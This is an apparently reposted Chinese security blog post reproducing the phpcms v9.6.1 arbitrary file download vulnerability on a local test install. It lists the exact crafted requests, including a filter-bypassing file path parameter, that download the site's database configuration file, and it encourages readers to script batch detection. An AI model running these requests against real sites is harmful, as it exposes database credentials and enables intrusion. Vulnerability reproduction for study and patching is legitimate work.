专栏首页漏斗社区力作|phpcms_v9.6.1 任意文件下载漏洞

力作|phpcms_v9.6.1 任意文件下载漏洞

前面咱们一起学习了phpcms_v9.6.0,任意文件上传漏洞复现的过程,不知道小伙伴们后面有没有想到如何进行批量检测呢?我尝试写了个Python脚本,这里要感谢下小建建的API,哈哈,感觉效果还不错;欢迎写好Python的小伙伴们和我一起交流呀!

创作背景:

上周发完phpcms_v9.6.0,任意文件上传漏洞复现的过程的文章后,有小伙伴们说phpcms_v9.6.1的任意文件下载一直复现不成功,于是就有了本文。

基础环境:

1、 phpcms_v9.6.1源码。

2、 web应用环境用于搭建phpcms。

需要工具:

1、 BurpSuite 或者hackBar等。

2、 PHPStudy或者wamp等。

源码部署:

参考:phpcms_v9.6.0 任意文件上传漏洞的链接 :

https://mp.weixin.qq.com/s/hApXD2cKG0a83fzkRTjAlA

0x01 同样的按照常规的源码部署流程先将phpcms_v9.6.1部署到web环境中,部署完访问首页,我是在本地主机上搭建的,首页地址是:http://127.0.0.1/phpcms961/index.php,成功访问便是搭建完成。

0x02 进入后台开启在模块->手机门户 中开启wap站点,开启成功后整个基础环境就配置完成。

漏洞复现:

0x01 在未登录的状态下访问以下链接http://127.0.0.1/phpcms961/index.php?m=wap&c=index&a=init&siteid=1,得到ogpin_siteid:3eefztsyqwyn5Fg3Ns7vDrwhqXGkts26mnUk0r9j

0x02获取到ogpin_siteid后使用POST方法访问以下链接,POST DATA的值就是就是第一步得到ogpin_siteid的值,POST DATA参数名为userid_flash。

【Request】http://127.0.0.1/phpcms961 /index.php?m=attachment&c=attachments&a=swfupload_json&src=a%26i=1%26m=1%26catid=1%26f=. /caches/configs/database.ph%*25*3ep%26modelid=1%26d=1&aid=1

【PostData】userid_flash=3eefztsyqwyn5Fg3Ns7vDrwhqXGkts26mnUk0r9j

得到ogpin_att_json:9b18kNFQJqHBkcjvJ7b2frhUSWYMdSCP2YWFK3cHTyRCW4eNlid12uYqwyosd8Yz_BJQkVbLOIokJFMdsSz2Hz9dYVfXKq4IPVNk_8KT-JNH0USR_oU70A7ehGmnFwCwi2p1ro1lNgVe7-OoUN0c7mXb2amfukXMd3Pi9JnLzZsOcJl5MxA

注:请求中标红的位置是想要要读取的文件路径,这里我读取的是数据连接文件。

0x03 获得到ogpin_att_json后访问以下连接地址其中a_k的值为0x02中的ogpin_att_json的值。

【request】http://127.0.0.1/phpcms961/index.php?m=content&c=down&a=init&a_k=9b18kNFQJqHBkcjvJ7b2frhUSWYMdSCP2YWFK3cHTyRCW4eNlid12uYqwyosd8Yz_BJQkVbLOIokJFMdsSz2Hz9dYVfXKq4IPVNk_8KT-JNH0USR_oU70A7ehGmnFwCwi2p1ro1lNgVe7-OoUN0c7mXb2amfukXMd3Pi9JnLzZsOcJl5MxA

便生成下载链接地址,点击下载,便下载获取得到database.php的文件,漏洞复现完成。

总结:

这个漏洞的复现过程也是属于较为简单的操作,需要明白整个漏洞利用流程,个别小伙伴们复现不成功,有可能wap未开启,或者第二步中绕过代码过滤时没处理好。同样有兴趣的小伙伴们也可以将这个过程用Python来实现,期待小伙伴和我一起交流。

本文分享自微信公众号 - 漏斗社区(newdooneSec),作者:Thinking

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-05-19

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 初探Burp Suite API 开发

    要使用python进行BurpSuite插件的开发需要安装Jython。下载地址:http://www.jython.org/downloads.html

    漏斗社区
  • 专属| 7种新预测执行攻击被爆出

    近日,研究人员报告了七种新的预测执行攻击。其中一种是新的Meltdown攻击变种,利用了英特尔的Protection Keys for Userspace,另一...

    漏斗社区
  • Java代码审计| Spring框架思路篇

    相信小伙伴们通过Java代码审计入门篇对Java的环境和工具有了一定的了解,重点掌握了Tomcat部署使用、IDEA部署WEB项目与调试、Maven项目管理工具...

    漏斗社区
  • 教你如何搭建本地YUM仓库,离线环境也可使用yum install命令

    由于工作需要,处理的服务器大多是内网环境,无法连接外网,在安装部署mysql,jdk,tomcat的时候还可以使用离线包+tar命令解压使用,但是安装redis...

    释然
  • 使用Python扩展lldb

    Xcode集成了LLDB,进一步简化了程序调试流程。虽然LLDB很强大,但是它的命令很有限。所幸的是,lldb包含了对python的支持,使得lldb的拓展成为...

    py3study
  • MAC OS搭建Hadoop伪分布式集群

    输出java版本 虽然默认已经将Java的路径配置到了系统环境变量中,但由于后续需要使用JAVA_HOME,我们最好将JAVA_HOME显式写入到系统的配置文件...

    超哥的杂货铺
  • Python爬虫之打码平台的使用

    现在很多网站都会使用验证码来进行反爬,所以为了能够更好的获取数据,需要了解如何使用打码平台爬虫中的验证码

    海仔
  • 相克军_Oracle体系_随堂笔记003-体系概述

    对Oracle生产库来讲,服务器进程(可以简单理解是前台进程)的数量远远大于后台进程。因为一个用户进程对应了一个服务器进程。

    Alfred Zhao
  • 基于PyTorch重写sklearn,《现代大数据算法》电子书下载

    HyperLearn是一个基于PyTorch重写的机器学习工具包Scikit Learn,它的一些模块速度更快、需要内存更少,效率提高了一倍。

    新智元
  • 云开发高阶实战任务总结云开发实现实时投票系统(一)

    表单功能:输入框,选择器,时间选择器,多选,定时器 相关组件:vant组件和ThorUI组件

    shaohui_xia

扫码关注云+社区

领取腾讯云代金券